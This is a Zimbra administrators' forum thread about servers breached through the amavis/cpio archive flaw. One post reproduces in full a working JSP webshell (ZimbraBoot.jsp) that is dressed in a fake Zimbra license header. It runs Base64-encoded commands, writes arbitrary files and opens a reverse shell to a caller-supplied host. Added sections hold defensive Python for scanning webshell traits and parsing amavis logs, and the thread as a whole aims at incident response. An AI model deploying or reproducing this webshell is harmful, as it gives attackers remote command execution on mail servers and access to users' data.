Attacker managed to upload files into Web Client directory

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
zenekbg
Posts: 7
Joined: Thu Oct 27, 2016 10:11 am

Re: Attacker managed to upload files into Web Client directory

Post by zenekbg »

robertvon wrote:Hi, we also get non newsletter.
Two of our servers were exploited because of the vulnerability.
At this time AFAIK the attacker uploaded a malicious file called ZimbraBoot.jsp in /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp
If you have information on how to double-check if the system is clean
after the patch, I will be happy to read it.

This is file ZimbraBoot.jsp


<!-- * ***** BEGIN LICENSE BLOCK *****
* Zimbra Collaboration Suite Web Client
* Copyright (C) 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021, 2022 Synacor, Inc.
*
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software Foundation,
* version 2 of the License.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along with this program.
* If not, see <https://www.gnu.org/licenses/>.
* ***** END LICENSE BLOCK *****
-->
<%@ page import="java.io.*, java.util.Base64, java.nio.file.*, java.lang.*, java.io.*, java.net.*, java.util.*" %>
<% String output = "";
class StreamConnector extends Thread {
    InputStream wz;
    OutputStream yr;

    StreamConnector(InputStream wz, OutputStream yr) {
        this.wz = wz;
        this.yr = yr;
    }

public void run() {
    BufferedReader r  = null;
    BufferedWriter w = null;
    try {
        r  = new BufferedReader(new InputStreamReader(wz));
        w = new BufferedWriter(new OutputStreamWriter(yr));
        char buffer[] = new char[8192];
        int length;
        while((length = r.read(buffer, 0, buffer.length)) > 0) {
            w.write( buffer, 0, length );
            w.flush();
        }
    } catch( Exception e ) { }
    try {
        if (r != null) {
             r.close();
        }
        if (w != null) {
             w.close();
        }
   } catch( Exception e ) { }
}
}
String key = request.getParameter("key");
if (key != null && key.equals("fomggpztgpdbyvftnpafbjbevpjqfwemt")) {
    String action = request.getParameter("action");
    if (action != null) {
        if (action.equals("append")) {
            String file = request.getParameter("file");
            if (file != null) {
                String textBase64 = request.getParameter("text");
                if (textBase64 != null) {
                    String text = new String(Base64.getDecoder().decode(textBase64));
                    try {
                        Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.APPEND);
                    } catch(IOException e) {
                        e.printStackTrace();
                    } output+="Appended!";
                }
            }
        } else if (action.equals("exec")) {
                String cmdBase64 = request.getParameter("cmd");
                if (cmdBase64 != null) {
                    byte[] bytesEncoded = Base64.getDecoder().decode(cmdBase64);
                    String cmd = new String(bytesEncoded);String s = null;
                    try {
                        output += "Exec res: ";
                        Process p = Runtime.getRuntime().exec(cmd,null,null);
                        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
                        while((s = sI.readLine()) != null) {
                            output += s;
                        }
                    } catch(IOException e) {
                        e.printStackTrace();
                    }
                }
        } else if (action.equals("sh")) {
                String ip = request.getParameter("ip");
                if (ip != null) {
                String port = request.getParameter("port");
                    if (port != null) {
                        try {
                            String suid = request.getParameter("suid");
                            StringBuffer shell = new StringBuffer();
                            if (suid == null) {
                                 shell.append("/bin/sh");
                            } else {
                                 shell.append(suid);
                                 shell.append(" -p");
                            }
                            Socket socket = new Socket(ip, Integer.parseInt(port));
                            Process process = Runtime.getRuntime().exec(shell.toString());
                            new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
                            new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
                            out.println("port opened on " + socket);
                        } catch( Exception e ) { }
                    }
                }
         } else if (action.equals("rewrite")) {
                String file = request.getParameter("file");
                if (file != null) {
                    String textBase64 = request.getParameter("text");
                    if (textBase64 != null) {
                        String text = new String(Base64.getDecoder().decode(textBase64));
                        try {
                            Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.TRUNCATE_EXISTING);
                        } catch(IOException e) {
                            e.printStackTrace();
                        }
                        output+="Rewritten!";
                   }
               }
        } else if (action.equals("create")) {
            String file = request.getParameter("file");
            if (file != null) {
                String textBase64 = request.getParameter("text");
                if (textBase64 != null) {
                    String text = new String(Base64.getDecoder().decode(textBase64));
                    try {
                         Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.CREATE);
                    } catch(IOException e) {
                        e.printStackTrace();
                    }
                    output+="Created!";
                }
            }
        }
    }
}%><%=output %>
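On the "how to double-check if the system is clean" question: the posted ZimbraBoot.jsp has a handful of source-level traits (a hard-coded key compared against a request parameter, Base64-decoded input handed to Runtime.exec, a raw Socket wired to a process, Files.write to an arbitrary path) that do not normally appear together in a shipped JSP. The script below is an added example, my own and not code from the thread or from Zimbra, that walks a jetty webapps tree and reports JSP files where several of those traits co-occur. The indicator patterns are the only part taken from the posted shell; the directory layout, file names and the three sample JSP files it scans are constructed for the demonstration, and the shell-like sample is a deliberately non-compiling fragment.

```python
"""Scan a Zimbra jetty webapps tree for JSP files that carry webshell traits.

Added example (not from the thread, not Zimbra's code). The indicator
patterns are taken from the ZimbraBoot.jsp posted above; the directory
layout and the sample JSP files are constructed for the demonstration.
"""
import re
import tempfile
from pathlib import Path

# Source-level traits of the posted shell. Any one of them also appears in
# legitimate code, so a file is reported only when several co-occur.
INDICATORS = {
    "runtime_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\("),
    "base64_decode": re.compile(r"Base64\.getDecoder\(\)\.decode\("),
    "raw_socket": re.compile(r"new\s+Socket\("),
    "file_write": re.compile(r"Files\.write\(\s*Paths\.get\("),
    # a process's stdout being pumped straight into a socket
    "stream_pump": re.compile(
        r"getInputStream\(\)[\s\S]{0,80}?socket\.getOutputStream\(\)"),
    # a long hard-coded secret compared against a request parameter
    "shared_secret": re.compile(
        r'getParameter\("\w+"\)[\s\S]{0,200}?\.equals\("[A-Za-z0-9]{16,}"\)'),
}
MIN_HITS = 2  # threshold; tune it against a known-clean install of the same patch level


def score_jsp(text):
    """Return the sorted list of indicator names that match the JSP source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root):
    """Map each JSP (path relative to root) to its hits when >= MIN_HITS."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*.jsp"):
        hits = score_jsp(path.read_text(errors="replace"))
        if len(hits) >= MIN_HITS:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample files (not real Zimbra JSPs).
BENIGN_JSP = """<%@ page import="java.util.*" %>
<% String skin = request.getParameter("skin");
   if (skin == null) skin = "harmony"; %>
<html><body>Skin: <%= skin %></body></html>
"""

# one indicator only: stays below the threshold
ONE_HIT_JSP = """<%@ page import="java.util.Base64" %>
<% String t = new String(Base64.getDecoder().decode(request.getParameter("t"))); %>
"""

# fragment with the posted shell's traits; undeclared variables, so it does not compile
SHELL_LIKE_JSP = "\n".join([
    '<% String key = request.getParameter("key");',
    'if (key != null && key.equals("CONSTRUCTEDSAMPLEKEY0123")) {',
    '    byte[] b = Base64.getDecoder().decode(textBase64);',
    '    Process p = Runtime.getRuntime().exec(cmd, null, null);',
    '    Socket socket = new Socket(ip, Integer.parseInt(port));',
    '} %>',
])


def demo():
    """Lay the constructed files out like a webapps tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {
            "zimbra/public/skin.jsp": BENIGN_JSP,
            "zimbra/public/token.jsp": ONE_HIT_JSP,
            "zimbraAdmin/public/jsp/Boot.jsp": SHELL_LIKE_JSP,  # constructed name
        }
        for rel, body in files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        return scan_tree(root)


if __name__ == "__main__":
    # against a real host: scan_tree("/opt/zimbra/jetty/webapps")
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against /opt/zimbra/jetty/webapps (the tree named in the thread) and treat every hit as a starting point rather than a verdict: diff flagged files against the same path on a freshly installed host at the same patch level, and check their mtime against the install and patch dates. A clean scan does not prove a clean host, since the shell can rewrite or create arbitrary files outside the webapps tree.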
zenekbg
Posts: 7
Joined: Thu Oct 27, 2016 10:11 am

Re: Attacker managed to upload files into Web Client directory

Post by zenekbg »

Sorry for the duplicate posts, something is giving me a php error in the forum and think the pasted code is not working. Turns out I made 3-4 duplicate posts and was only able to delete the last one.
jered
Advanced member
Posts: 55
Joined: Sat Sep 13, 2014 12:35 am
Location: Somerville, MA

Re: Attacker managed to upload files into Web Client directory

Post by jered »

The exploit code is GPL'ed, so remember this if you repurpose it for your own future exploits ;-)

Seriously, though, this is pretty terrifying -- to leave this un-patched without notification or an advisory for a month is awful. I wasn't able to find anything suspicious on my server, but I don't have confidence in its integrity given how severe this vulnerability is.
BradC
Outstanding Member
Posts: 266
Joined: Tue May 03, 2016 1:39 am

Re: Attacker managed to upload files into Web Client directory

Post by BradC »

jered wrote:The exploit code is GPL'ed, so remember this if you repurpose it for your own future exploits ;-)

Seriously, though, this is pretty terrifying -- to leave this un-patched without notification or an advisory for a month is awful. I wasn't able to find anything suspicious on my server, but I don't have confidence in its integrity given how severe this vulnerability is.
If you had pax installed this is no vulnerability. If you didn't then all bets are off.
rainer_d
Advanced member
Posts: 86
Joined: Fri Sep 12, 2014 11:40 pm

Re: Attacker managed to upload files into Web Client directory

Post by rainer_d »

But only if MTA + web interface run on the same server?

We have historically always separated the two...
tinnh1
Posts: 2
Joined: Thu Sep 22, 2022 8:39 am

Re: Attacker managed to upload files into Web Client directory

Post by tinnh1 »

If MTA and MB run on the same server, we cannot exploit it.
I have done a POC for a mail server (multi-server, MTA and Mailbox on different servers, cpio ver 2.11, pax not installed, CentOS): cannot exploit.
Does anyone have the same situation?
Log:
Oct 12 15:15:23 mail1 amavis[114902]: (114902-06) (!)WARN: Using cpio instead of pax can be a security risk; please add: $pax='pax'; to amavisd.conf and check that the pax(1) utility is available on the system!
Oct 12 15:15:23 mail1 amavis[114902]: (114902-06) (!)Decoding of p003 (POSIX tar archive (GNU)) failed, leaving it unpacked: do_pax_cpio: exit 2 /usr/bin/cpio: cannot make directory `lucky': No such file or directory\n/usr/bin/cpio: lucky/ShareApp.jsp: Cannot open: No such file or directory\n5 blocks at (eval 140) line 1551

- Lucky is payload extension .tar
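The two amavis lines above are the defender-side signal in this thread: the "Using cpio instead of pax" warning says the host is on the cpio decoding path BradC refers to, and the do_pax_cpio failure names the archive part, its type and the entry cpio was asked to write (lucky/ShareApp.jsp). The script below is an added example of mine, not from the thread or from Zimbra, that pulls those fields out of amavis log lines and also checks whether an amavisd.conf text sets $pax = 'pax'; as the warning asks. The two log lines are copied from tinnh1's post; the two amavisd.conf fragments are constructed.

```python
"""Summarise amavis log lines that show the cpio/pax decoding path.

Added example (not from the thread, not Zimbra's code). The two sample log
lines come from the post above; the amavisd.conf fragments are constructed.
"""
import re

# Sample lines copied from the post. amavis writes embedded newlines as the
# two characters backslash-n, reproduced here as "\\n".
SAMPLE_LOG = [
    "Oct 12 15:15:23 mail1 amavis[114902]: (114902-06) (!)WARN: Using cpio instead of pax can be a security risk; please add: $pax='pax'; to amavisd.conf and check that the pax(1) utility is available on the system!",
    "Oct 12 15:15:23 mail1 amavis[114902]: (114902-06) (!)Decoding of p003 (POSIX tar archive (GNU)) failed, leaving it unpacked: do_pax_cpio: exit 2 /usr/bin/cpio: cannot make directory `lucky': No such file or directory\\n/usr/bin/cpio: lucky/ShareApp.jsp: Cannot open: No such file or directory\\n5 blocks at (eval 140) line 1551",
]

WARN_RX = re.compile(r"\((\d+-\d+)\) \(!\)WARN: Using cpio instead of pax")
DECODE_RX = re.compile(
    r"\((\d+-\d+)\) \(!\)Decoding of (\S+) \((.+?)\) failed.*?do_pax_cpio")
ENTRY_RX = re.compile(r"cpio: ([^\s:]+): Cannot open")
DIR_RX = re.compile(r"cannot make directory `([^']+)'")
# archive entries a mail gateway has no business extracting
SUSPICIOUS_EXT = (".jsp", ".jspx", ".jar", ".war", ".sh")


def parse_amavis(lines):
    """Collect cpio warnings, failed do_pax_cpio decodes and suspicious entries."""
    report = {"cpio_warned": set(), "failed_decodes": [], "suspicious_entries": []}
    for line in lines:
        m = WARN_RX.search(line)
        if m:
            report["cpio_warned"].add(m.group(1))  # amavis task id
            continue
        m = DECODE_RX.search(line)
        if m:
            entries = ENTRY_RX.findall(line)
            report["failed_decodes"].append({
                "task": m.group(1), "part": m.group(2), "type": m.group(3),
                "dirs": DIR_RX.findall(line), "entries": entries,
            })
            report["suspicious_entries"].extend(
                e for e in entries if e.lower().endswith(SUSPICIOUS_EXT))
    return report


# Constructed amavisd.conf fragments: a commented-out setting does not count.
CONF_WITHOUT_PAX = "# $pax = 'pax';\n$unrar = 'unrar';\n"
CONF_WITH_PAX = "$pax = 'pax';\n$unrar = 'unrar';\n"
PAX_RX = re.compile(r"^\s*\$pax\s*=\s*'pax'\s*;", re.M)


def pax_configured(conf_text):
    """True when an uncommented line sets $pax = 'pax'; in the config text."""
    return bool(PAX_RX.search(conf_text))


if __name__ == "__main__":
    r = parse_amavis(SAMPLE_LOG)
    print("tasks that used cpio:", sorted(r["cpio_warned"]))
    for d in r["failed_decodes"]:
        print(f"task {d['task']}: part {d['part']} ({d['type']}) -> {d['entries']}")
    print("suspicious entries:", r["suspicious_entries"])
    print("pax configured:", pax_configured(CONF_WITH_PAX), pax_configured(CONF_WITHOUT_PAX))
```

Feed it the lines from /var/log/zimbra.log (or wherever amavis logs on the host) after filtering on "amavis"; every task id in cpio_warned is a message that was unpacked with cpio rather than pax, and every .jsp entry under a failed decode is worth correlating with the file scan of the webapps tree. The config check only reads text, so it says nothing about whether the pax binary is actually installed; confirm that separately on the host.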
dmouraomartins
Posts: 1
Joined: Thu Oct 13, 2022 1:00 pm

Re: Attacker managed to upload files into Web Client directory

Post by dmouraomartins »

If you want a copy of this malicious attachment (news.jpg), you can private message me.
Please, I would like a copy of this malicious attachment.
Thnx
robertvon
Posts: 21
Joined: Wed Sep 21, 2016 1:23 pm
ZCS/ZD Version: ZCS 8.8.15-P42 FOSS

Re: Attacker managed to upload files into Web Client directory

Post by robertvon »

zenekbg wrote: If you have information on how to double-check if the system is clean
after the patch, I will be happy to read it.
At this time I have no information unfortunately.
I'm still double checking log files ...